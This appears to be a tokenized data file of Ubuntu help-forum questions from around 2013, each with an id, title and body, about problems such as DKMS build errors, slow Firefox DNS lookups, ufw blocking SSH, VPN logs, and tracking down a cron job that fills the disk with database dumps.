317674	linux headers upgrade error	i got this error ( quoted below ) when upgrading from 12.10 to 13.04 . should i be worried ( since i can detect my flaws in my instalation ) but i get this at any new linux-header upgrade i do . what does it mean ? error ! the dkms.conf for this module includes a build_exclusive directive which does not match this kernel/arch . this indicates that it should not be built . dkms.conf contains this : # modprobe information used for dkms modules # # this is a stub file , should be edited when needed , # used by default by dkms . /usr/src/vboxhost-4.2.16/dkms.conf contains this lines : . # # @ file . # linux dkms config script for the virtualbox guest kernel modules . # . # . # copyright ( c ) 2006-2010 oracle corporation . # . # this file is part of virtualbox open source edition ( ose ) , as . # available from http : //www.virtualbox.org . this file is free software ; . # you can redistribute it and/or modify it under the terms of the gnu . # general public license ( gpl ) as published by the free software . # foundation , in version 2 as it comes in the `` copying '' file of the . # virtualbox ose distribution . virtualbox ose is distributed in the . # hope that it will be useful , but without any warranty of any kind . . # package_name= '' vboxhost '' package_version=4.2.16 autoinstall=yes built_module_name [ 0 ] = '' vboxdrv '' built_module_location [ 0 ] = '' vboxdrv '' dest_module_location [ 0 ] = '' /kernel/misc '' built_module_name [ 1 ] = '' vboxnetflt '' built_module_location [ 1 ] = '' vboxnetflt '' dest_module_location [ 1 ] = '' /kernel/misc '' built_module_name [ 2 ] = '' vboxnetadp '' built_module_location [ 2 ] = '' vboxnetadp '' dest_module_location [ 2 ] = '' /kernel/misc '' built_module_name [ 3 ] = '' vboxpci '' built_module_location [ 3 ] = '' vboxpci '' dest_module_location [ 3 ] = '' /kernel/misc '' the dots `` . '' infront of the `` # '' are to deal with the make up codes . i had this while installing linux-headers-3.8.0-26-generic but when i `` run '' uname -r this is the result : 3.8.0-26-generic so i should just ignore this ? thanks in advance
317676	firefox slow dns lookup due to ipv6 in ubuntu 13.04	just installed a fresh copy of ubuntu 13.04 64 and ran into a very strange problem . chrome is working fine but firefox sometimes connects to sites very slow . it can take around 10 seconds before firefox starts to load something ( i can see something connecting to or look up ) . i actually found out how to fix it . just go to about : config and set network.dns.disableipv6 to true and firefox starts loading pages very fast but my question is what 's changed since ubuntu 12.10 . in my ubuntu 12.10 network.dns.disableipv6 is set to false and firefox works properly .
317679	thinkpad hdaps with ultrabay hdd	i 'm aware that thinkpad hdaps 's linux driver can stop the standard hard drive in your computer . however , i have a ssd plugged into my main port and a regular hdd plugged into my ultrabay . is it possible to wire hdaps so that it stops the secondary hdd as oppose to the ssd ? i 've googled but it seems like no one has done this .
317681	'system testing ' app does n't work in ubuntu 13.04	just installed ubuntu 13.04 64 and decided to run 'system testing ' ( in dash type 'system testing ' ) but it does n't seem to be working . it 's stuck at 'gathering information from your system ' : how to fix it ?
317682	how to enable scrolling with arrow keys ?	i have a problem on my enw acer aspire m3 . when i 'm using firefox and want to scroll a page down by pressing an arrowkey , instead of going down slowly , i get down instantly to bot button . how can i enable proper scrolling ?
317687	is there a way to launch the updater.exe file of guitar pro 6 when running in wine ?	i have downloaded the windows version of guitar pro 6 and it runs in wine , however when i try to enter my license key , i get the error message `` ca n't open updater '' and then when i click ok the program shuts down . i have tried to run guitar pro updater as a separate file but this also fails to open . has anybody had this problem ? if so how did you cure it ?
317688	kubuntu 13.04 smb protocol source	i have a share on an ubuntu machine that has some movies on it . after installing kde 13.04 i can not play the movies on the share from dolphin . i get the following error : the following plugin is required : *smb protocol source do you want to search for this now ? yes / no no option helps . i know i can mount the share properly and access it from there , any other solution to make it work properly from dolphin ?
317695	webcam is not working	i am using dell inspiron n series laptop.i just downloaded ubuntu 13.04 and now when i open apps like webcam toy on google chrome i can see nothing but a black screen ! can anyone help me ?
317696	compression or decompression	my question is that if i have two files suppose : file_1.gz and file_2.gz then can i compress these to files into another compressed file ex file_1+2.gz ( just a name . ) the catch is that i dont want it to be decompressed first , just direct concatenate the contents to a single file . any views ?
317704	ubuntu server setup - no internet access	i am having internet problem with ubuntu server.i have installed ubuntu server in my college server and internet connection type is dhcp . i am getting lights at the backside of the cpu where we insert lan cable and if i put the same cable to other pc then its getting the internet with out any problem . here some error really bothering me end_request : i/o error , dev sda , sector 17548653 i am getting this error in the logs.as i know this sounds to me some drive issue but this error i am getting every time while restarting the network with service command . help me to solve this issue .
317705	kde konsole crashes when closing popups	when i open konsole and hit 'about konsole ' or 'adjust scrollback ' or try to modify any color , it opens up popup as expected . but all those popups cause konsole to crash when i close them . any ideas what 's causing this ? what to look for ? konsole version 2.10.5 , kde development platform 4.10.5 output when i run konsole from gnome terminal : lapsa : /var/log $ konsole qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . lapsa : /var/log $ the program 'konsole ' received an x window system error . this probably reflects a bug in the program . the error was 'badwindow ( invalid window parameter ) ' . ( details : serial 2153 error_code 3 request_code 20 minor_code 0 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) kdebugstream called after destruction ( from virtual konsole : :sessionmanager : :~sessionmanager ( ) file konsole/src/sessionmanager.cpp line 59 ) konsole sessionmanager destroyed with sessions still alive stumbled up on this question ubuntu 13.04 - can not start kile interestingly - when i run it in sudo konsole , it does not crash .
317708	steam servers - error code 2 - fat32 error ( portal 2 steam via wine )	i have a dual boot computer , 64 bit windows 7 and 64 bit ubuntu 13.04 . i have steam installed on my computer on the windows 7 side , however i also use it from the ubuntu side via wine as well . when i was trying to start portal 2 on the ubuntu side however , a `` completing installation '' window came up . after the game 's loading got to one percent it returned this error : the steam servers are too busy to handle you request for portal 2 . error code ( 2 ) so i went to the steam powered site and looked up the error code and it said the fallowing : many of these issues were tied to fat32 drives which has been corrected in a steam update . some users have also reported moving the steam installation to the default c : \ drive will correct this issue . if the issue persists , please contact steam support . so i updated steam and it still gives me this error . i would contact steam support but it 's natively for windows and mac only and i 'm using ubuntu so they cant help me . any suggestions ? edit : to clarify , i can not just install the linux version of steam , as the game i want to play is not compatible with linux . thus , it wo n't let me download it or install it .
317720	wireshark problems with configuration	i recently installed wireshark and before i could even start capturing anything it says `` no interface can be used for capturing in this system with the current configuration '' as im new to wireshark , does anyone know how to change the current configuration and what to change them to ? sorry for any duplication and for shortness in description but i cant proceed without this configuration being set right
317723	ubuntu 12.04 - intel hd4600 haswell graphics issue	ubuntu 12.04 is not 'recognizing ' my intel haswell i5 hd4600 graphics ( which 13.04 does ) . i have the traditional 2d desktop and am seeing copious amounts of screen-tearing . the main vice is that i can not drag windows around the desktops in expo . is there a way to fetch the drivers that work in ubuntu 13.04 to be on my ubuntu 12.04 desktop or some other workaround ? i have already installed and updated from the 'x-swat ' graphics repo .
317729	ssh connections rejected after ufw allow 22	i am trying to setup ufw on a 12.04 server . ssh works great with ufw off . setting root @ ugvps : ~ # ufw enable firewall is active and enabled on system startup root @ ugvps : ~ # ufw status status : active to action from -- -- -- -- -- -- 22 allow anywhere the server now refuses all connections to 22 and the following appears in the log jul 8 15:12:49 ugvps kernel : [ 445929.928075 ] [ ufw block ] in=venet0 out= mac= src=217.86.198.115 dst=my.serv.eri.pxx len=48 tos=0x00 prec=0x00 ttl=118 id=14040 df proto=tcp spt=48965 dpt=22 window=8192 res=0x00 syn urgp=0 what have i done wrong ? thanks edit : this is running inside an openvz container if that matters . i 've followed this guide to get ufw running in the first place
317730	google chrome not connecting to websites	i upgraded from ubuntu 12.10 to 13.04 . on starting i found that google-chrome was not working . starting google-chrome from the command line showed it was complaining about missing libudev.so.0 . so i uninstalled chrome and reinstalled it from the deb provided by google . now chrome starts but does not connect to any websites outside the local network ( we are behind a proxy ) . firefox/links etc work fine so the connection is okay . how could i go about fixing this ? thanks , eta : on starting google chrome through the command line i get the following message : gtk-message : failed to load module `` overlay-scrollbar '' glib-gio-message : using the 'memory ' gsettings backend . your settings will not be saved or shared with other applications . created new window in existing browser session .
317731	examples of multiple binary packages	i 'm trying to include a preview of the new experimental gtk+ 3 build of inkscape in our ppa ... i want to compile the upstream source using different compile-time options to generate two different binary packages : `` inkscape-trunk '' ( the normal daily build ) and `` inkscape-trunk-gtk3 '' ( the experimental gtk+ 3 build ) . below , i 've shown how i 'd do this manually using the upstream source but i need to know how to do it using debian packaging tools . i already found the mpb and vim ubuntu source packages , which both create multiple binaries using different compile-time configurations . however , both of these use old debhelper syntax , and the rules files both end up being rather complex . my question : can anyone suggest a suitable example package , in which multiple binary builds are performed using the new elegant `` dh '' debhelper syntax ? is this even possible , or do i have to resort to writing the rules file manually . # building two different configurations of the same package ... # make subfolders for building the two different configurations src_dir=`pwd` build_default_dir= $ { src_dir } /build-default build_gtk3_dir= $ { src_dir } /build-gtk3 mkdir -p $ build_default_dir mkdir -p $ build_gtk3_dir # generate build files ./autogen.sh # configure and build the default version cd $ build_default_dir ../configure -- prefix=/usr/ make # configure and build the gtk+ 3 version cd $ build_gtk3_dir ../configure -- prefix=/usr/ -- enable-gtk3-experimental make
317738	can i prevent/restrict standard users from installing/uninstalling software ?	can i prevent/restrict standard user from installing/uninstalling software in ubuntu 12.04 desktop ?
317739	how to add an additional sound track to an existing video	i have a mp4 and mkv video file which also has its own audio track . i want to add an additional track to it to cover another language for it , what terminal or gui way is there available to insert and sync a mp3 file to the already existing video so that : the video shows 2 audio tracks ( the existing one and the new one am inserting ) optionally the video shows the name of the tracks i can sync the new audio with the video i do not replace the existing audio with the new one maintain the same video quality as before ( it is a 1080p video with very high details . do not want to mess with this since it takes way too long to get it right ) this would help in , for example , adding additional language sound tracks to an existing video .
317753	install dropbox over browser vnc	i want to install dropbox , but i only have access to firefox over vnc .
317761	disable daily anacron mail updates	every day , i get the following mail delivered by postfix : from : anacron < root @ name.domain > to : root @ name.domain subject : anacron job 'cron.daily ' on name content-type : text/plain ; charset=us-ascii message-id : < 20130708082739.88ae83a3f72 @ name.domain.domain > date : mon , 8 jul 2013 10:27:39 +0200 ( cest ) /etc/cron.daily/ntpdate : 8 jul 10:27:39 ntpdate [ 4617 ] : step time server 85.254.216.1 offset -1.454673 sec however , i 'd like to limit anacron to only warn me if something is wrong . is there any way to accomplish this ? i could change the anacrontab file to send all mails to /dev/null , but then i 'd get no warning mails whatsoever . is there a better way to control the granularity of anacron status updates ?
317762	is it possible to automatically switch to hdmi sound output ? 13.04	i 've seen a few similar questions however could n't find a solution and they were all a few years old . when i plug my laptop into the tv hdmi port i have to manually go through the sound options and select hdmi to get the sound to play through the tv . is there a way to make it switch automatically on connection ? thanks
317763	apt-get : no space left on device ( 12.04 )	i have read every thread i could find -- even the ones that say that the question has been answered elsewhere but none of them address the specific issue i am having . update manager ran and produced errors relating to unmet dependency and suggested using apt-get install -f which fails with this message : unpacking linux-headers-3.5.0-36 ( from ... /linux-headers-3.5.0-36_3.5.0-36.57~precise1_all.deb ) ... dpkg : error processing /var/cache/apt/archives/linux-headers-3.5.0-36_3.5.0-36.57~precise1_all.deb ( -- unpack ) : unable to create `/usr/src/linux-headers-3.5.0-36/arch/arm/mach-iop32x/include/mach/glantank.h.dpkg-new ' ( while processing `./usr/src/linux-headers-3.5.0-36/arch/arm/mach-iop32x/include/mach/glantank.h ' ) : no space left on device i suspect that the last 5 words no space left on device are significant but df and du both show adequate space . so i am wondering , what device needs more space ?
317765	how do i stop `` failure to download extra data files '' error with pepflashplugininstaller ?	am running chromium on 13.04 . for the last few days every morning i get a notification that says `` failure to download extra data files . '' the dialog box specifically indicates pepflashplugin-installer and has a prompt `` run this action now . '' if i run the action , no complaints . at some point , the dialog will return . if i run the the installer from the cli , my system tells me that i already have the latest version . i read elsewhere to try this : sudo rm -f /var/lib/update-notifier/package-data-downloads/flashplugin-installer.failed this does n't stop the notification from reappearing . i 've also tried , but the notification immediately reappears : sudo apt-get -- reinstall install flashplugin-installer
317766	system slows to a crawl while doing large file copy	i have a very fast laptop : core i7 6830 ( passmark 7700 ) with a fast sata iii controller and 24gb ram . ubuntu 12.0.4 lts installed . however it comes to its knees when doing a large file copy operation : e.g . firefox and google chrome essentially hang . they do make progress but at maybe one percent of normal speed . `` top '' shows 5 % cpu utilization by the `` cp '' command and 28.6 % i/o wait . this system has four physical cores and 8 hyperthreaded cpus - so it makes no sense for it to become crippled like this . any insights why a file copy operation would hobble the system like this ? note : the system is usually v speedy . i can run three virtual machines as wels as my heavy dev env on the laptop proper simultaneously . but at the time tis occurred , nothing was running except for one firefox browser . so the system was extremely lightly loaded . here is cat /proc/cpuinfo for the eight of the 8 cpu's processor : 7 vendor_id : genuineintel cpu family : 6 model : 58 model name : intel ( r ) core ( tm ) i7-3630qm cpu @ 2.40ghz stepping : 9 microcode : 0x15 cpu mhz : 1200.000 cache size : 6144 kb physical id : 0 siblings : 8 core id : 3 cpu cores : 4 apicid : 7 initial apicid : 7 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm ida arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid fsgsbase smep erms bogomips : 4788.91 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : here is meminfo : steve @ mithril : ~ $ cat /proc/meminfo memtotal : 24574816 kb memfree : 371336 kb buffers : 94708 kb cached : 22629684 kb swapcached : 0 kb active : 2660768 kb inactive : 20775964 kb active ( anon ) : 713292 kb inactive ( anon ) : 154116 kb active ( file ) : 1947476 kb inactive ( file ) : 20621848 kb unevictable : 0 kb mlocked : 0 kb swaptotal : 16601084 kb swapfree : 16601084 kb dirty : 532 kb writeback : 0 kb anonpages : 712380 kb mapped : 191488 kb shmem : 155064 kb slab : 420828 kb sreclaimable : 388300 kb sunreclaim : 32528 kb kernelstack : 3760 kb pagetables : 29028 kb nfs_unstable : 0 kb bounce : 0 kb writebacktmp : 0 kb commitlimit : 28888492 kb committed_as : 3421652 kb vmalloctotal : 34359738367 kb vmallocused : 744572 kb vmallocchunk : 34358988288 kb hardwarecorrupted : 0 kb anonhugepages : 0 kb hugepages_total : 0 hugepages_free : 0 hugepages_rsvd : 0 hugepages_surp : 0 hugepagesize : 2048 kb directmap4k : 81920 kb directmap2m : 24991744 kb
317772	xubuntu 13.04 boots to command line instead of gui . how to get back gui ?	i have xubuntu 13.04 on my desktop as a dual-boot system with xp . installed it at first time two days ago and suddenly got this problem . write my question from good old troubleproof windows xp ( long live microsoft ) . the problem : xubuntu boots to command line instead of gui . it prompts for a login and a password and after i provide i get a command line instead of xubuntu . there are dozens of questions here about the same problem . ( from 2010 it seems ubuntu can not fix the problem ; 2010 is the oldest post i found ) . but all answers explain how ubuntu may be temporarily repaired to load gui , not xubuntu . mostly people suggest to type : startx in command line . but is it suitable for xubuntu ? xubuntu uses xfce , not gnom . what do i need to type to start gui form command line ? why this happens ? how to start gui again ? and what to do to avoid it next time ?
317774	version 12.04 and unity upgrade	when unity updates , is it possible to install it to 12.04 ? i 've seen some howto 's on this , but they do n't seem to work for me . for instance , sudo add-apt-repository ppa : unity-team/ppa does n't seem to work at noobslab . so i assume that unity versions are tied closely to the distro and updating unity without updating ubuntu is not recommended ? is there a link to the latest ppa for unity ? i do n't know how those ppa sites work . i 'm new here . thanks
317781	service starts when called , but not on startup	i wrote a simple upstart script that kicks off a python program , i have it saved as vgpusher.conf . it does n't start automatically , but if i run sudo start vgpusher it starts and runs just fine . the code is simple : description `` vgpush '' start on runlevel [ 2345 ] stop on runlevel [ ! 2345 ] script cd /home/computer/ python pusher.py end script i placed the script in /etc/init . other than that , i have done no configuration . the machine is running ubuntu 10.04 server . do i need to take an extra step for the service to start on startup ?
317783	some questions about using openvpn on ubuntu	i am new to using ubuntu and openvpn . below are my questions : in microsoft windows , the files in the config folder have the file extension ovpn . i understand that in ubuntu , i will have to change it to conf . is that correct ? what are the sudo commands to launch openvpn service , supposing i open and use a terminal window ? during the time when openvpn program connects to a gateway/exit node , i would like to see the verbose log as in the following example ( part of the log is displayed ) : sat jul 06 21:50:38 2013 openvpn 2.3.2 x86_64-w64-mingw32 [ ssl ( openssl ) ] [ lzo ] [ pkcs11 ] [ eurephia ] [ ipv6 ] built on jun 3 2013 sat jul 06 21:50:38 2013 management : tcp socket listening on [ af_inet ] sat jul 06 21:50:38 2013 need hold release from management interface , waiting ... sat jul 06 21:50:38 2013 management : client connected from [ af_inet ] sat jul 06 21:50:38 2013 management : cmd 'state on' sat jul 06 21:50:38 2013 management : cmd 'log all on' sat jul 06 21:50:38 2013 management : cmd 'hold off' sat jul 06 21:50:38 2013 management : cmd 'hold release' sat jul 06 21:50:38 2013 socket buffers : r= [ 65536- > 65536 ] s= [ 65536- > 65536 ] sat jul 06 21:50:38 2013 management : > state:1234567890 , resolve , , , sat jul 06 21:50:42 2013 attempting to establish tcp connection with [ af_inet ] 123.456.789.012:443 sat jul 06 21:50:42 2013 management : > state:1234567890 , tcp_connect , , , sat jul 06 21:50:45 2013 tcp connection established with [ af_inet ] 123.456.789.012:443 sat jul 06 21:50:45 2013 tcpv4_client link local : [ undef ] sat jul 06 21:50:45 2013 tcpv4_client link remote : [ af_inet ] 123.456.789.012:443 sat jul 06 21:50:45 2013 management : > state:1373291445 , wait , , , sat jul 06 21:50:46 2013 management : > state:1373291446 , auth , , , sat jul 06 21:50:46 2013 tls : initial packet from [ af_inet ] 123.456.789.012:443 , sid=6c8b3036 7002cb48 what sudo command should i use ?
317788	how to download a .tar.gz file from a redirected link in terminal ?	i want to download the file at http : //www.snort.org/downloads/1806 as a .tar.gz file using terminal but the problem is that when i use : sudo wget http : //www.snort.org/downloads/1806 it downloads a file and names it 1806 but it is n't a folder not a .tar.gz file which i can extract . please let me know how can i do this from within the terminal . regards .
317794	how do i adjust the window and keyboard size ?	i have installed ubuntu touch on my htc desire , it is working well but the size of my keyboard is too big ! ! how can i adjust this ?
317801	add file to set screen size on xorg	i recently installed ubuntu on my new chromebook pixel and i 'm trying to get the resolution right . here are the instructions i have received : option # 4 set screen size on xorg so that dpi goes up to 240 add a file /etc/x11/xorg.conf.d/90-monitor.conf to explicitly set the screen size , i.e . containing section `` monitor '' identifier `` '' displaysize 270 180 # in millimeters endsection these numbers are actually taken from the xorg log file in /var/log -- no clear to me why the correct numbers do n't end up being used . not all apps handle this correctly option # 4 set screen size on xorg so that dpi goes up to 240 add a file /etc/x11/xorg.conf.d/90-monitor.conf to explicitly set the screen size , i.e . containing section `` monitor '' identifier `` '' displaysize 270 180 # in millimeters endsection these numbers are actually taken from the xorg log file in /var/log -- no clear to me why the correct numbers do n't end up being used . not all apps handle this correctly my question is , how do i `` add a file ? ''
317806	share wifi internet via ethernet cable	i have a notebook connected to the internet via wifi . i 'd like to share that internet connection to my pc via an ethernet cable . all descriptions on how to do that show an option box in the network manager which has to be set to `` shared to other computers '' . however , that box seems to be missing . am i missing some package ? my os : ubuntu 12.10 gnome remix
317808	network issues after suspend on ubuntu 13.04	i 've been having troubles with my wireless connections the past week im running ubuntu 13.04 on an acer aspire 4738z-4210 and a few days ago when i returned from suspend i got a enable network button unchecked and would n't turn on after i tried to click it i 've tried finding my driver form my wireless and do a suspend driver but that hasnt affected it at all
317813	ubuntu lock screen will not open	many times when the screen has automatically locked and i type the password , the message just reappears . i can continue to enter the password , but the message just pops up again . in order to log in i have to hit the `` change user '' button and login using that screen instead . after i have logged in i get a crash report that wont load much information . i am using ubuntu 13.04. anyone have an idea as to how i can make the screen work ? update : it looks like the problem could be related to google chrome somehow , i allays have that program running the the problem occurs . update ( 01.10.2013 ) : this is still an issue
317818	command for opening application using java through terminal ?	i downloaded tomighty ( pomodoro app ) on my ubuntu 12.04 . everytime i have to start tomighty , i have to right click on the tomighty 's jar file and click on open with sun java 7. is there any command which i can save and just double clicking on it or adding it at startup execute it .
317823	adjusting bright makes ubuntu not to respond	have just installed ubuntu 12.04 lts and when adjusting the bright through the keyboard ubuntu gets frozen and needs to be restarted by forcing the turnoff button , have noticed that this only happens when pressing the bright key fastly so need to press the key once then wait a few seconds and then press again , windows 7 is also installed in the same machine and is able to set the bright correctly and it does not matter how fast i press the key , someone can help me in how to solve this issue , thanks in advance.-
317825	in ubuntu 13.04 , after the computer sleeps , i lose my wireless connection	after sleep or hibernation , the wireless icon shows no connection . when i click on it i see several wireless networks but not the one that i was connected before . when i click the `` edit networks ... '' i see the network that i used before . currently the only solution is to reboot which makes the computer useless
317828	windows 7 starter and ubuntu dual boot	i have an aspire one netbook with 1gb ram . i have windows 7 starter , and i would like to try a double boot with ubuntu . i know that it is possible to download it to a flash pen , but i was wondering if having both starter and ubuntu on my hard drive would make the computer super slow . i have no previous experience doing this , so any input on this matter would be greatly appreciated ! thanks !
317832	show just two lines in lm-sensors	i want to add lm-sensors to my conky setup , but it always shows this : coretemp-isa-0000 adapter : isa adapter physical id 0 : +41.0°c ( high = +82.0°c , crit = +102.0°c ) core 0 : +41.0°c ( high = +82.0°c , crit = +102.0°c ) core 1 : +40.0°c ( high = +82.0°c , crit = +102.0°c ) i want to have just to lines ( for the two cores ) in conky . is there some way to either tell sensors to display just those to lines , or make conky do it or something ?
317834	kde konsole has ctrl-c remapped to new tab	for a week or so , the ctrl+c mapping does not send an interrupt , but opens a new tab with another profile . it might have happend around the time when there were updates for all kde software . i start with a single tab with the solarized color scheme : then i press ctrl+c and get a new tab with a different profile : however , if i press ctrl+shift+c , i get the interrupt : in the settings , it seems all fine : how can i get it back to have ctrl+c send an interrupt and ctrl+shift+c copy text ?
317835	ubuntu 12.04 internet connection not working ( anymore )	i have a dual boot setup with windows 7 and ubuntu 12.04 . in windows my connection is perfect but when booting into ubuntu i can not connect at all . the network manager states that i 'm connected but i can not access any websites or ping any external addresses . i 've only been using ubuntu for a few weeks so do n't know too much about it yet . i 'm also not well versed in networking . the strange thing is that it has worked perfectly for a while after the initial install and sometime afterwards it was not working for about 2 days and then it worked again for a day and now it 's completely non-functioning . i 'm investigating the possibility of it being an issue with recently install software but am hoping you guys can spot something suspicious with the results posted below . below is some commands and their output that i 've run that i 've seen asked for on other threads : ifconfig eth0 link encap : ethernet hwaddr f4:6d:04:90 : d3 : fe inet addr:10.0.0.102 bcast:10.0.0.255 mask:255.255.255.0 inet6 addr : fe80 : :f66d:4ff : fe90 : d3fe/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:281 errors:0 dropped:64 overruns:0 frame:0 tx packets:581 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:21637 ( 21.6 kb ) tx bytes:56926 ( 56.9 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1429 errors:0 dropped:0 overruns:0 frame:0 tx packets:1429 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:93375 ( 93.3 kb ) tx bytes:93375 ( 93.3 kb ) ping 192.168.1.254 this is the address for the router 's web interface which i can not even connect to . ping 192.168.1.254 ( 192.168.1.254 ) 56 ( 84 ) bytes of data . from 10.0.0.2 icmp_seq=1 destination net unreachable from 10.0.0.2 icmp_seq=2 destination net unreachable from 10.0.0.2 icmp_seq=3 destination net unreachable from 10.0.0.2 icmp_seq=4 destination net unreachable from 10.0.0.2 icmp_seq=5 destination net unreachable nm-tool networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : connected default : yes hw address : f4:6d:04:90 : d3 : fe route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.0.0.2 0.0.0.0 ug 0 0 0 eth0 10.0.0.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 10.0.0.102 prefix : 24 ( 255.255.255.0 ) gateway : 10.0.0.2 dns : 10.0.0.2 ping -c4 4.2.2.2 ping 4.2.2.2 ( 4.2.2.2 ) 56 ( 84 ) bytes of data . from 10.0.0.2 icmp_seq=1 destination net unreachable from 10.0.0.2 icmp_seq=2 destination net unreachable from 10.0.0.2 icmp_seq=3 destination net unreachable from 10.0.0.2 icmp_seq=4 destination net unreachable -- - 4.2.2.2 ping statistics -- - 4 packets transmitted , 0 received , +4 errors , 100 % packet loss , time 2997ms if there are any other commands to run or things to confirm please ask . thank you in advance : )
317847	opening two applications with single click ?	i want to open firefox with few websites and eclipse with single click of .sh file . i am trying the following command : eclipse firefox http : //localhost/wp3.5.2/ http : //localhost/wp2/ they work well individually , but how to make both of these commands together so i can open firefox and eclipse through my 'work.sh ' executable file .
317851	using popd without removing last value	how can i get the behavior of using popd without actually popping the last directory off of the stack ? in other words , i want to navigate back to the last directory that i set with pushd , but i want it to stay at the top of the stack so the next popd will take me to that same directory ( which would still be on the top of the stack ) again .
317855	shortcut for nautilus	i would like to use super+e as a shortcut to open nautilus . whenever i add super+e as a shortcut in system settings > keyboard > shortcuts it works fine . but after i reboot/re-log super+e does not work anymore . on the other hand , the shortcut is still correctly listed in keyboard > shortcuts . i 've already tried compizconfig manager and configured a new command for starting nautilus , but this seems to be buggy : nautilus will always open behind the current active window . any ideas ?
317860	will i able to access ecryptfs -ed folders in another installed ubuntu ?	i have a hdd with linux ubuntu partition but with no linux only win7 . i found a solution how to access and save my ext2 linux files in windows . i downloaded diskinternals linux reader . it accesses my home folder but encrypted with private 'ecryptfs ' . i do n't really know what it is ? i can not see my files . my questions : if i save this home folder under windows . will i be able to mount and access it under a new installed ubuntu ?
317868	thunderbird address book error on start	when i start thunderbird ( version 17.0.7 ) in ubuntu 13.04 i get the following notification - any thoughts on what i can do to fix this ? thanks update for bob here are my installed add-ons , i believe it is all default except for adblock
317869	installation hangs while installing ubuntu 13.04 on preinstalled windows 8	i am trying to install ubuntu 13.04 ( 64 bits ) along side windows 8 , vaio . when i boot from usb it asks me option to `` install ubuntu '' . but when i select it then installation hangs , blank screen . i have already taken following steps disable secure boot disable fast start up turn of windows defender created separate unallocated disc space for ubuntu can any one help me with this .
317874	opening email links to appear in browser not working right	using lxle ( lubuntu ) 12.04 32-bit . using thunderbird and firefox for main web apps . whenever i click on a web link within a message in thunderbird , it opens a new tab in firefox , but always opens the page at this url : `` http : //www.lxle.net/index.php ? x=about '' . this behavior does n't change when running firefox in safe mode . firefox is not configured by me in any way to redirect to that lxle main page , so it must be originating from within the distro os . changing settings for the default web browser has n't changed this behavior , either from the gui `` preferred applications '' app , or from the command `` sudo update-alternatives -- config x-www-browser '' . how to get the email-based links to open properly in firefox ?
317880	is it possible to make the text in terminal invisible ?	i would like to know to make the text in terminal invisible . that 's it just to make it invisible , not to change it 's color to hide it with the back ground , but completely invisible . thanks
317884	sony vpceh26en backlight not working with ubuntu	my sony vaio is not responding to the backlight control keys fn + f6 and f5 . kindly give some solution .it is very important for me to get this.i have tried google but now my slide bar and fn key totally not responding : ( .
317887	du ( disk usage ) reports 6.1m but directory is empty	this does not make any sense ! user @ localhost : ~/folder $ du -h -- max-depth=1 6.1m ./subfolder 6.1m . user @ localhost : ~/folder $ ls -la subfolder total 6228 drwx -- -- -- 2 user user 6369280 2013-07-08 16:03 . drwx -- -- -- 9 user user 4096 2013-07-08 16:04 .. du reports 6.1 megabytes , ls reports a total of `` 6228 '' ( i do n't know total of what ) ... but the folder is empty ... indeed , there is no file there and it should be empty indeed . why is that ? can someone explain this to me ? this is happening in a vps running ubuntu 10.04 thank you .
317888	ca n't find where scheduled task is set	i have a production server running a scheduled task that i simply ca n't track down . it seems that it is running dbdump.bash on a daily basis , but none of the cron files have a reference to that or anything running a back up ! i 've tried to grep -r `` dbdump.bash '' / to search for the offending job , but no luck so far . the backups are large , and if not manually removed will completely fill up the hard drive . how can i track this down ? thanks ! update here 's the contents of /etc/crontab : # /etc/crontab : system-wide crontab # unlike any other crontab you do n't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d . these files also have username fields , # that none of the other crontabs do . shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin # m h dom mon dow user command 17 * * * * root cd / & & run-parts -- report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly ) # update : contents of /var/spool/cron/crontabs/tweaver # do not edit this file - edit the master and reinstall . # ( /tmp/crontab.cb6x6l/crontab installed on tue dec 21 20:08:50 2010 ) # ( cron version -- $ id : crontab.c , v 2.13 1994/01/17 03:20:37 vixie exp $ ) # m h dom mon dow command 5 2 * * * /home/tweaver/dbrefresh/dbdump.bash
